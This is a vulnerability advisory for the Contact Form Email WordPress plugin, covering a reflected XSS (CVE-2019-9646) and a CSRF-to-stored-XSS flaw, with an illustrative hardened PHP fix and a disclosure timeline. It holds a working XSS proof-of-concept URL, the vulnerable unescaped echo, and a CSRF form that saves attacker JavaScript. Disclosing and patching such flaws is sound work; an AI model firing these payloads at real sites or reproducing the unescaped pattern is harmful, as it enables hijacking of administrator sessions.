• Vulnerability: XSS & CSRF
  • Affected Software: Contact Form Email (30,000+ active installations)
  • Affected Version: 1.2.65
  • Patched Version: 1.2.66
  • CVE: CVE-2019-9646 (XSS)
  • Risk: Medium
  • Vendor Contacted: 10/31/2018
  • Vendor Fix: 10/31/2018
  • Public Disclosure: 02/05/2019

Reflected XSS

CVSS

6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

The Contact Form Email WordPress plugin is vulnerable to reflected XSS because it echoes the item GET parameter into an HTML attribute without proper encoding.

Successful exploitation allows an attacker to execute JavaScript in the context of the application on behalf of an attacked user. This in turn enables an attacker to bypass CSRF protection and thus perform any actions the legitimate user can perform, as well as read any data the user can access.

Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail&edit=1&cal=1&item='"><img+src%3Dx+onerror%3Dalert(1)>

Code

contact-form-to-email/cp_admin_int_edition.inc.php
<input name="cfwpp_edit" type="hidden" value="<?php echo $_GET["item"]; ?>" />

CSRF (to XSS)

CVSS

6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

The plugin allows custom JavaScript to be added to forms. Because the request that saves this JavaScript is not protected against CSRF, an attacker can store arbitrary JavaScript in the application if an authenticated user visits a web page containing malicious HTML and/or JavaScript.

Proof of Concept

<html>
  <body>
    <form action="http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail&edit=1&cal=1&item=js" method="POST">
      <input type="hidden" name="CP&#95;CFTE&#95;post&#95;edition" value="1" />
      <input type="hidden" name="cfwpp&#95;edit" value="js" />
      <input type="hidden" name="editionarea" value="alert(2);" />
      <input type="hidden" name="submit" value="Save&#32;Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
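A hardened version of the edit form and its save handler, added here as an illustration and not the plugin's own code or its 1.2.66 fix: the reflected value is escaped for an HTML attribute context, and the save request is bound to a nonce and a capability check so the cross-site form above is rejected. The WordPress functions used are real; the cfte_* names, the nonce action string and the option name are assumptions.

```php
<?php
// Added example (not the plugin's code). WordPress API functions
// (esc_attr, wp_nonce_field, check_admin_referer, current_user_can,
// sanitize_key, wp_unslash, update_option, wp_die) are real;
// the cfte_* names and the option name are hypothetical.

// Rendering: escape the reflected parameter for an attribute context and
// emit a nonce so the save request is tied to the logged-in user's session.
function cfte_render_edit_form( $item ) {
    // The plugin's item names (e.g. "js") are plain keys, so constrain the
    // value before reflecting it at all; esc_attr() still handles quoting.
    $item = sanitize_key( $item );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'cfte_save_edition_' . $item, 'cfte_nonce' ); ?>
        <input name="cfwpp_edit" type="hidden" value="<?php echo esc_attr( $item ); ?>" />
        <textarea name="editionarea"></textarea>
        <input type="submit" name="submit" value="Save Changes" />
    </form>
    <?php
}

// Saving: require a capability and a valid nonce before writing anything.
function cfte_handle_save() {
    if ( ! isset( $_POST['CP_CFTE_post_edition'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    $item = sanitize_key( wp_unslash( $_POST['cfwpp_edit'] ?? '' ) );
    // Dies with a 403 if the nonce is missing, expired, or was minted for
    // another action or user: a form hosted on an attacker's site cannot
    // obtain a nonce for the victim, so the request stops here.
    check_admin_referer( 'cfte_save_edition_' . $item, 'cfte_nonce' );
    // Custom JavaScript is the feature itself, so the content is stored as-is;
    // the controls above ensure only an authorised, intentional save gets here.
    $code = wp_unslash( $_POST['editionarea'] ?? '' );
    update_option( 'cfte_custom_' . $item, $code );
}
```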

Timeline

  • 10/31/2018 Asked for email address via contact form
  • 10/31/2018 Vendor responds, advisory sent
  • 10/31/2018 Vendor releases fix
  • 02/05/2019 Disclosure